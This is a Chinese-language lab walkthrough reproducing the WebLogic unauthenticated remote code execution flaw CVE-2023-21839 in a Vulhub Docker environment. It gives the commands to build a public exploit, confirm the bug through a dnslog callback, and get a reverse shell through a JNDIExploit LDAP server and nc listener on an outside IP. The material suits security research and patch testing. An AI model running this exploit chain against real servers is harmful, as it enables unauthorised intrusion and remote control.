Weblogic未授权远程代码执行漏洞 (CVE-2023-21839)

简介

Vulhub是一个基于dockerdocker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。

Github地址:https://github.com/vulhub/vulhub

1
2
3
4
5
6
# 下载项目
git clone https://github.com/vulhub/vulhub.git
# 进入靶场目录
cd vulhub/xxx
# 启动靶场
docker-compose up

漏洞环境

靶场:192.168.199.132

1
2
cd vulhub/weblogic/CVE-2023-21839
docker-compose up

环境启动后,访问后台:http://x.x.x.x:7001/console/login/LoginForm.jsp

漏洞复现

1)工具:

下载地址:https://github.com/4ra1n/CVE-2023-21839
编译软件

1
2
cd cmd/
go build -o CVE-2023-21839.exe

2)dnslog回显

1
CVE-2023-21839.exe -ip 192.168.199.132 -port 7001 -ldap ldap://m9ezsq.dnslog.cn/

3)反弹shell

使用Jndi漏洞利用工具,在公网服务器开启ldap服务,监听11389端口

1
2
3
4
5
6
7
8
#开启ldap服务
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 121.4.69.24 -l 11389 -p 18080

#监听18888端口
nc -lvp 18888

#执行exp,成功反弹shell
CVE-2023-21839.exe -ip 192.168.199.132 -port 7001 -ldap ldap://121.4.69.24:11389/Basic/ReverseShell/121.4.69.24/18888